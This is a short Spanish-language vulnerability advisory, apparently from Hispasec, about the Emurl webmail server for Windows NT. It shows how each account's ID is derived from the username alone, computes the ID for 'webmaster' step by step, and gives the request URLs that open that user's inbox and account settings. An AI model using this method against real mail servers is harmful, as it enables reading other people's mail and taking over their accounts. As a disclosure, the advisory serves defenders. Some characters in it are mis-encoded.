Emurl es un servidor de correo electrónico con interfaz Web para Windows NT. Una vulnerabilidad permite a cualquiera leer los mensajes, capturar contraseñas y configurar cualquier cuenta con tan sólo conocer el nombre de usuario.
Para acceder a cualquier recurso de una cuenta toda la seguridad, inexistente, de este sistema se basa en un número de identificación (ID) para cada usuario. El algoritmo es pésimo, para calcularlo sólo se basa en el nombre de usuario, en vez de hacerlo en la contraseña, por ejemplo.
Para hallar el ID de una cuenta basta con calcular el código ASCII de cada uno de los caracteres que forman el nombre y sumarles la posición. Por ejemplo, en el caso de que el nombre de usuario es «webmaster»:
w = 119 + 1 = 120
e = 101 + 2 = 103
b = 98 + 3 = 101
m = 109 + 4 = 113
a = 97 + 5 = 102
s = 115 + 6 = 121
t = 116 + 7 = 123
e = 101 + 8 = 109
r = 114 + 9 = 123
ID=120103101113102121123109123
Para acceder al buz¢n de entrada y ver los mensajes:
http://www.algunwebmail.com/scripts/emurl/recman.dll
TYPE=RECIEVEMAIL&USER=120103101113102121123109123
Para acceder a la configuraci¢n de la cuenta:
http://www.algunwebmail.com/scripts/emurl/MAKEHTML_M.dll?
TYPE=USER&USER=USER=120103101113102121123109123
M s informaci¢n:
Emurl:
http://www1.seattlelab.com/emurl
Bernardo Quintero
bernardo@hispasec.com